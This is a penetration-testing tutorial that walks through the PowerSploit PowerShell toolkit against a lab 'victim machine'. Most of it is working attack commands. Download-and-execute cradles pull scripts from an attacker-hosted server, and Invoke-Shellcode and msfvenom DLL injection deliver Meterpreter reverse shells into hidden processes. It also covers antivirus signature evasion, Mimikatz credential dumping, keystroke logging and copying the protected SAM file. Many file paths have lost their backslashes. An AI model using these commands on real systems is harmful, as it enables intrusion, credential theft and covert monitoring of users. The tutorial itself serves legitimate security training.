PowerShell toolkit: PowerSploit
PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test.
To follow along with the article please download the latest version of PowerSploit available here: https://github.com/PowerShellMafia/PowerSploit
If you have GIT, then you can simply run the following command to get all files from the github repository:
git clone https://github.com/mattifestation/PowerSploit.git
To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions.
Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it.
For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python:
python -m SimpleHTTPServer
Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address>:8000/
PowerSploit has categorized all the scripts in a pretty clear and organized manner:
|Antivirus Bypass||Find bytes of a file which has a matching signature in antivirus.|
|Code Execution||Used to execute code on victim machine.|
|Exfiltration||Manipulate and collect information & data from victim machine(s).|
|Persistence||Maintain control to machine by adding persistence to scripts.|
|PE Tools||Handy PowerShell cmdlets for enumeration.|
|Recon||Perform reconnaissance tasks using victim machine.|
|Reverse Engineering||Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal.|
|Script Modification||Create and manipulate scripts on victim machine.|
In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration).
Install and run a PowerShell script:
IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”)
This command when run in PowerShell will install that PowerShell for the current process of PowerShell only.
This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk.
We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/CodeExecution/Invoke-Shellcode.ps1”)|
Run the above command in a PowerShell window to install “Invoke-Shellcode” script.
To get some information about the module type:
Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:
|Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.0.0.14 -Lport 4444 -Force|
Also we had setup a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell.
Please note that at the time of writing this article, only two Metasploit payloads are supported:
If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process.
Inject in an existing process
Get Process ID (PID) of a process using “Get-Process”.
Note that the “Id” field is the Process ID (PID) of the corresponding process name.
Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload.
After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:
Inject in a new process
Create a new hidden process and inject the payload into it:
|Start-Process c:windowssystem32notepad.exe -WindowStyle Hidden|
And we got a Meterpreter shell on the attacking machine:
This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk.
We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/CodeExecution/Invoke-DllInjection.ps1”)|
Generate the Metasploit Meterpreter DLL and download it on the server:
|msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.14 LPORT=4444 -f dll > msf.dll|
Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice.
Create a process in hidden mode and inject the DLL into it.
|Start-Process c:windowssystem32notepad.exe -WindowStyle Hidden|
|Invoke-DllInjetion -ProcessID 2240 -Dll c:usersmasterDesktopmsf.dll|
We received a successful Meterpreter shell on the attacking machine:
This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of file which have the AV signature.
We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/AntivirusBypass/Find-AVSignature.ps1”)|
Running “Find-AVSignature” on a Meterpreter Windows executable:
|Find-AVSignature -StartByte 0 -EndByte 6144 -Interval 50 -Path C:testexemptnc.exe -OutPath c:usersmasterDesktopmsf.exe -OutPath c:usersmasterDesktoprun1 -Verbose|
The installed antivirus detected malicious files and we can see bytes with the AV signature:
Now we can see the bytes of “msf.exe” containing AV signatures.
This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or any other task. This technique can be very useful for privilege escalation.
We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/PETools/Get-DllLoadPath.ps1”)|
Find where “Acrobat.exe” loads “shell32.dll” DLL from:
|Get-DllInjection –ExecutablePath “C:Program Files (x86)AdobeAcrobat 10.0AcrobatAcrobat.exe” –Dllname shell32.dll|
This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all.
We can easily install the Recon PowerShell script “Invoke-Portscan” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/Recon/Invoke-Portscan.ps1”)|
Run a port scan for a list of hosts and ports:
|Invoke-Portscan -Hosts 10.0.0.1,10.0.0.2,10.0.0.7,10.0.0.14 -Ports “23,22,21,8080,8000,3389”|
There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options.
It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively.
This cmdlet is used to find the DNS PTR record for corresponding IP address(es).
We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/Recon/Invoke-ReverseDnsLookup.ps1”)|
Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch:
|Invoke-ReverseDnsLookup -IpRange <IP_Address/Range>|
Unfortunately, it does not support comma separated values or file input of ranges like 184.108.40.206-50.
It accepts only single IP or CIDR format for IP range.
This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server.
We can easily install the Recon PowerShell script “Get-HttpStatus” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/Recon/Get-HttpStatus.ps1”)|
Execute this cmdlet using the following command (the dictionary file is that of DirBuster):
|Get-HttpStatus -Target 10.0.0.7 -Path c:usersmasterDesktopdirectory-list-2.3-small.txt|
If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:
|Get-HttpStatus -Target 10.0.0.7 -Path c:usersmasterDesktopdirectory-list-2.3-small.txt -UseSSL|
If the service is running on some other port like 8080, 8000, etc, for defining a port use the “-Port” switch.
|Get-HttpStatus -Target 10.0.0.7 -Path c:usersmasterDesktopdirectory-list.txt -Port 8080|
It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too.
This cmdlet is used to find Unicode or ASCII characters in a file. It is similar to what we have in UNIX based systems, the “strings” utility.
We can easily install the Reverse Engineering PowerShell script “Get-Strings” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/ReverseEngineering/Get-Strings.ps1”)|
Get-Strings -Path <file_name_with_path>
It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell
Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now.
This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc from the local computer or other computers in the domain.
It is one of the most useful PowerSploit tools in a penetration testing engagement.
We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/Exfiltration/Invoke-Mimikatz.ps1”)|
Dump credentials using: Invoke-Mimikatz -DumpCreds
You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….)
This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystorkes are stored in a local file on default (temp directory) or custom location.
We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/Exfiltration/Get-Keystrokes.ps1”)|
This cmdlet can be executed using the following command:
|Get-Keystrokes -LogPath c:usersmasterdesktopkeylogger.txt|
Key log is stored in: c:usersmasterdesktopkeylogger.txt
This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp.
This cmdlet is used to copy protected files which cannot be copied when the operating system is running.
We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using:
|IEX (New-Object Net.WebClient).DownloadString(“http://10.0.0.14:8000/Exfiltration/Invoke-NinjaCopy.ps1”)|
Execute “Invoke-NinjaCopy” using the following the command to copy the protected “SAM” file:
|Invoke-NinjaCopy -Path “C:WindowsSystem32configSAM” -LocalDestination “C:UsersmasterDesktopSAM”|
When you try to perform the same operation using the “copy” command, the file cannot be copied: